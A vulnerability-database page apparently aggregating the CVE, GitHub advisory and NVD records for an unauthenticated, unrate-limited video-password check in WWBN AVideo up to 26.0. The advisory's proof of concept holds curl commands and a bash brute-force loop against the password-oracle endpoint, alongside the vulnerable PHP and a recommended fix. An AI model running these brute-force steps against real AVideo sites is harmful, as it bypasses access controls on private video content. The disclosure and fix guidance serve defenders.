Vulnerability-Lookup

CVE-2026-33763 (GCVE-0-2026-33763)

Vulnerability from cvelistv5 – Published: 2026-03-27 14:25 – Updated: 2026-03-30 12:06

Title

AVideo has an Unauthenticated Video Password Brute-Force Vulnerability via Unrate-Limited Boolean Oracle

Summary

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `get_api_video_password_is_correct` API endpoint allows any unauthenticated user to verify whether a given password is correct for any password-protected video. The endpoint returns a boolean `passwordIsCorrect` field with no rate limiting, CAPTCHA, or authentication requirement, enabling efficient offline-speed brute-force attacks against video passwords. Commit 01a0614fedcdaee47832c0d913a0fb86d8c28135 contains a patch.

Severity ?

5.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CWE

CWE-307 - Improper Restriction of Excessive Authentication Attempts

Assigner

GitHub_M

References

URL

Tags

	https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
	https://github.com/WWBN/AVideo/commit/01a0614fedc…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	WWBN	AVideo	Affected: <= 26.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33763",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-30T12:06:10.864677Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-30T12:06:27.809Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 26.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `get_api_video_password_is_correct` API endpoint allows any unauthenticated user to verify whether a given password is correct for any password-protected video. The endpoint returns a boolean `passwordIsCorrect` field with no rate limiting, CAPTCHA, or authentication requirement, enabling efficient offline-speed brute-force attacks against video passwords. Commit 01a0614fedcdaee47832c0d913a0fb86d8c28135 contains a patch."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-307",
              "description": "CWE-307: Improper Restriction of Excessive Authentication Attempts",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-27T14:25:12.794Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8prq-2jr2-cm92",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8prq-2jr2-cm92"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/01a0614fedcdaee47832c0d913a0fb86d8c28135",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/01a0614fedcdaee47832c0d913a0fb86d8c28135"
        }
      ],
      "source": {
        "advisory": "GHSA-8prq-2jr2-cm92",
        "discovery": "UNKNOWN"
      },
      "title": "AVideo has an Unauthenticated Video Password Brute-Force Vulnerability via Unrate-Limited Boolean Oracle"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33763",
    "datePublished": "2026-03-27T14:25:12.794Z",
    "dateReserved": "2026-03-23T18:30:14.126Z",
    "dateUpdated": "2026-03-30T12:06:27.809Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33763\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-27T15:16:58.390\",\"lastModified\":\"2026-03-31T18:44:43.017\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `get_api_video_password_is_correct` API endpoint allows any unauthenticated user to verify whether a given password is correct for any password-protected video. The endpoint returns a boolean `passwordIsCorrect` field with no rate limiting, CAPTCHA, or authentication requirement, enabling efficient offline-speed brute-force attacks against video passwords. Commit 01a0614fedcdaee47832c0d913a0fb86d8c28135 contains a patch.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-307\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"26.0\",\"matchCriteriaId\":\"774C24F1-9D26-484F-B931-1DA107C8F588\"}]}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/commit/01a0614fedcdaee47832c0d913a0fb86d8c28135\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-8prq-2jr2-cm92\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33763\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-30T12:06:10.864677Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-30T12:06:24.463Z\"}}], \"cna\": {\"title\": \"AVideo has an Unauthenticated Video Password Brute-Force Vulnerability via Unrate-Limited Boolean Oracle\", \"source\": {\"advisory\": \"GHSA-8prq-2jr2-cm92\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 26.0\"}]}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-8prq-2jr2-cm92\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-8prq-2jr2-cm92\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/WWBN/AVideo/commit/01a0614fedcdaee47832c0d913a0fb86d8c28135\", \"name\": \"https://github.com/WWBN/AVideo/commit/01a0614fedcdaee47832c0d913a0fb86d8c28135\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `get_api_video_password_is_correct` API endpoint allows any unauthenticated user to verify whether a given password is correct for any password-protected video. The endpoint returns a boolean `passwordIsCorrect` field with no rate limiting, CAPTCHA, or authentication requirement, enabling efficient offline-speed brute-force attacks against video passwords. Commit 01a0614fedcdaee47832c0d913a0fb86d8c28135 contains a patch.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-307\", \"description\": \"CWE-307: Improper Restriction of Excessive Authentication Attempts\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-27T14:25:12.794Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33763\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-30T12:06:27.809Z\", \"dateReserved\": \"2026-03-23T18:30:14.126Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-27T14:25:12.794Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-8PRQ-2JR2-CM92

Vulnerability from github – Published: 2026-03-26 18:07 – Updated: 2026-03-27 21:38

Summary

AVideo has an Unauthenticated Video Password Brute-Force Vulnerability via Unrate-Limited Boolean Oracle

Details

Summary

The get_api_video_password_is_correct API endpoint allows any unauthenticated user to verify whether a given password is correct for any password-protected video. The endpoint returns a boolean passwordIsCorrect field with no rate limiting, CAPTCHA, or authentication requirement, enabling efficient offline-speed brute-force attacks against video passwords.

Details

The vulnerable endpoint is defined at plugin/API/API.php:1111-1133:

public function get_api_video_password_is_correct($parameters)
{
    $obj = new stdClass();
    $obj->videos_id = intval($parameters['videos_id']);
    $obj->passwordIsCorrect = true;
    $error = true;
    $msg = '';

    if (!empty($obj->videos_id)) {
        $error = false;
        $video = new Video('', '', $obj->videos_id);
        $password = $video->getVideo_password();
        if (!empty($password)) {
            $obj->passwordIsCorrect = $password == $parameters['video_password'];
        }
    } else {
        $msg = 'Videos id is required';
    }

    return new ApiObject($msg, $error, $obj);
}

The get() dispatcher at API.php:191-209 routes GET requests directly to this method without any authentication enforcement:

public function get($parameters) {
    // ... optional user login if credentials provided ...
    $APIName = $parameters['APIName'];
    if (method_exists($this, "get_api_$APIName")) {
        $str = "\$object = \$this->get_api_$APIName(\$parameters);";
        eval($str);
    }
}

The application has a checkRateLimit() mechanism (line 5737) that is applied to user registration (line 4232) and user deactivation (line 5705), but is not applied to this password verification endpoint.

Additionally, video passwords are stored in plaintext (objects/video.php:523-527):

public function setVideo_password($video_password) {
    AVideoPlugin::onVideoSetVideo_password($this->id, $this->video_password, $video_password);
    $this->video_password = trim($video_password);
}

The comparison at line 1125 uses loose equality (==) rather than strict equality (===).

PoC

Step 1: Identify a password-protected video

curl -s "http://localhost/plugin/API/get.json.php?APIName=video&videos_id=1" | jq '.response.rows[0].video_password'

A non-empty value (e.g., "1") indicates the video is password-protected.

Step 2: Test incorrect password (oracle returns false)

curl -s "http://localhost/plugin/API/get.json.php?APIName=video_password_is_correct&videos_id=1&video_password=wrongguess"

Expected response:

{"response":{"videos_id":1,"passwordIsCorrect":false},"error":false}

Step 3: Brute-force the password

for pw in password 123456 secret admin test video1 qwerty; do
  result=$(curl -s "http://localhost/plugin/API/get.json.php?APIName=video_password_is_correct&videos_id=1&video_password=$pw" | jq -r '.response.passwordIsCorrect')
  echo "$pw: $result"
  [ "$result" = "true" ] && echo "FOUND: $pw" && break
done

No rate limiting is encountered regardless of request volume.

Step 4: Unlock the video with the discovered password

curl -s "http://localhost/view/video.php?v=1&video_password=DISCOVERED_PASSWORD" -c cookies.txt

The password is stored in the session (CustomizeUser.php:806-807) granting persistent access.

Impact

An attacker can brute-force the password of any password-protected video on the platform without authentication. Since video passwords are typically simple shared secrets (not per-user credentials), common password dictionaries are likely to succeed quickly. Successful exploitation bypasses the access control for password-protected content, which may include commercially sensitive, private, or restricted video content. The lack of any rate limiting means an attacker can test thousands of passwords per second.

Recommended Fix

Add rate limiting to the endpoint using the existing checkRateLimit() mechanism:

public function get_api_video_password_is_correct($parameters)
{
    $this->checkRateLimit('video_password_check', 5, 300); // 5 attempts per 5 minutes per IP

    $obj = new stdClass();
    $obj->videos_id = intval($parameters['videos_id']);
    // ... rest of existing code
}

Hash video passwords using password_hash()/password_verify() instead of plaintext storage and loose comparison:

// In setVideo_password:
$this->video_password = password_hash(trim($video_password), PASSWORD_DEFAULT);

// In the check endpoint:
$obj->passwordIsCorrect = password_verify($parameters['video_password'], $password);

Use strict comparison (===) if plaintext passwords must be retained temporarily during migration.

Severity ?

5.3 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33763"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-307"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-26T18:07:38Z",
    "nvd_published_at": "2026-03-27T15:16:58Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe `get_api_video_password_is_correct` API endpoint allows any unauthenticated user to verify whether a given password is correct for any password-protected video. The endpoint returns a boolean `passwordIsCorrect` field with no rate limiting, CAPTCHA, or authentication requirement, enabling efficient offline-speed brute-force attacks against video passwords.\n\n## Details\n\nThe vulnerable endpoint is defined at `plugin/API/API.php:1111-1133`:\n\n```php\npublic function get_api_video_password_is_correct($parameters)\n{\n    $obj = new stdClass();\n    $obj-\u003evideos_id = intval($parameters[\u0027videos_id\u0027]);\n    $obj-\u003epasswordIsCorrect = true;\n    $error = true;\n    $msg = \u0027\u0027;\n\n    if (!empty($obj-\u003evideos_id)) {\n        $error = false;\n        $video = new Video(\u0027\u0027, \u0027\u0027, $obj-\u003evideos_id);\n        $password = $video-\u003egetVideo_password();\n        if (!empty($password)) {\n            $obj-\u003epasswordIsCorrect = $password == $parameters[\u0027video_password\u0027];\n        }\n    } else {\n        $msg = \u0027Videos id is required\u0027;\n    }\n\n    return new ApiObject($msg, $error, $obj);\n}\n```\n\nThe `get()` dispatcher at `API.php:191-209` routes GET requests directly to this method without any authentication enforcement:\n\n```php\npublic function get($parameters) {\n    // ... optional user login if credentials provided ...\n    $APIName = $parameters[\u0027APIName\u0027];\n    if (method_exists($this, \"get_api_$APIName\")) {\n        $str = \"\\$object = \\$this-\u003eget_api_$APIName(\\$parameters);\";\n        eval($str);\n    }\n}\n```\n\nThe application has a `checkRateLimit()` mechanism (line 5737) that is applied to user registration (line 4232) and user deactivation (line 5705), but is **not** applied to this password verification endpoint.\n\nAdditionally, video passwords are stored in plaintext (`objects/video.php:523-527`):\n\n```php\npublic function setVideo_password($video_password) {\n    AVideoPlugin::onVideoSetVideo_password($this-\u003eid, $this-\u003evideo_password, $video_password);\n    $this-\u003evideo_password = trim($video_password);\n}\n```\n\nThe comparison at line 1125 uses loose equality (`==`) rather than strict equality (`===`).\n\n## PoC\n\n**Step 1: Identify a password-protected video**\n\n```bash\ncurl -s \"http://localhost/plugin/API/get.json.php?APIName=video\u0026videos_id=1\" | jq \u0027.response.rows[0].video_password\u0027\n```\n\nA non-empty value (e.g., `\"1\"`) indicates the video is password-protected.\n\n**Step 2: Test incorrect password (oracle returns false)**\n\n```bash\ncurl -s \"http://localhost/plugin/API/get.json.php?APIName=video_password_is_correct\u0026videos_id=1\u0026video_password=wrongguess\"\n```\n\nExpected response:\n```json\n{\"response\":{\"videos_id\":1,\"passwordIsCorrect\":false},\"error\":false}\n```\n\n**Step 3: Brute-force the password**\n\n```bash\nfor pw in password 123456 secret admin test video1 qwerty; do\n  result=$(curl -s \"http://localhost/plugin/API/get.json.php?APIName=video_password_is_correct\u0026videos_id=1\u0026video_password=$pw\" | jq -r \u0027.response.passwordIsCorrect\u0027)\n  echo \"$pw: $result\"\n  [ \"$result\" = \"true\" ] \u0026\u0026 echo \"FOUND: $pw\" \u0026\u0026 break\ndone\n```\n\nNo rate limiting is encountered regardless of request volume.\n\n**Step 4: Unlock the video with the discovered password**\n\n```bash\ncurl -s \"http://localhost/view/video.php?v=1\u0026video_password=DISCOVERED_PASSWORD\" -c cookies.txt\n```\n\nThe password is stored in the session (`CustomizeUser.php:806-807`) granting persistent access.\n\n## Impact\n\nAn attacker can brute-force the password of any password-protected video on the platform without authentication. Since video passwords are typically simple shared secrets (not per-user credentials), common password dictionaries are likely to succeed quickly. Successful exploitation bypasses the access control for password-protected content, which may include commercially sensitive, private, or restricted video content. The lack of any rate limiting means an attacker can test thousands of passwords per second.\n\n## Recommended Fix\n\n1. **Add rate limiting** to the endpoint using the existing `checkRateLimit()` mechanism:\n\n```php\npublic function get_api_video_password_is_correct($parameters)\n{\n    $this-\u003echeckRateLimit(\u0027video_password_check\u0027, 5, 300); // 5 attempts per 5 minutes per IP\n\n    $obj = new stdClass();\n    $obj-\u003evideos_id = intval($parameters[\u0027videos_id\u0027]);\n    // ... rest of existing code\n}\n```\n\n2. **Hash video passwords** using `password_hash()`/`password_verify()` instead of plaintext storage and loose comparison:\n\n```php\n// In setVideo_password:\n$this-\u003evideo_password = password_hash(trim($video_password), PASSWORD_DEFAULT);\n\n// In the check endpoint:\n$obj-\u003epasswordIsCorrect = password_verify($parameters[\u0027video_password\u0027], $password);\n```\n\n3. **Use strict comparison** (`===`) if plaintext passwords must be retained temporarily during migration.",
  "id": "GHSA-8prq-2jr2-cm92",
  "modified": "2026-03-27T21:38:24Z",
  "published": "2026-03-26T18:07:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8prq-2jr2-cm92"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33763"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/01a0614fedcdaee47832c0d913a0fb86d8c28135"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo has an Unauthenticated Video Password Brute-Force Vulnerability via Unrate-Limited Boolean Oracle"
}

FKIE_CVE-2026-33763

Vulnerability from fkie_nvd - Published: 2026-03-27 15:16 - Updated: 2026-03-31 18:44

Severity ?

5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/WWBN/AVideo/commit/01a0614fedcdaee47832c0d913a0fb86d8c28135	Patch
	security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-8prq-2jr2-cm92	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	wwbn	avideo	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588",
              "versionEndIncluding": "26.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `get_api_video_password_is_correct` API endpoint allows any unauthenticated user to verify whether a given password is correct for any password-protected video. The endpoint returns a boolean `passwordIsCorrect` field with no rate limiting, CAPTCHA, or authentication requirement, enabling efficient offline-speed brute-force attacks against video passwords. Commit 01a0614fedcdaee47832c0d913a0fb86d8c28135 contains a patch."
    }
  ],
  "id": "CVE-2026-33763",
  "lastModified": "2026-03-31T18:44:43.017",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 1.4,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-27T15:16:58.390",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/WWBN/AVideo/commit/01a0614fedcdaee47832c0d913a0fb86d8c28135"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8prq-2jr2-cm92"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-307"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33763 (GCVE-0-2026-33763)

GHSA-8PRQ-2JR2-CM92

Summary

Details

PoC

Impact

Recommended Fix

FKIE_CVE-2026-33763

Tags

Sightings

Nomenclature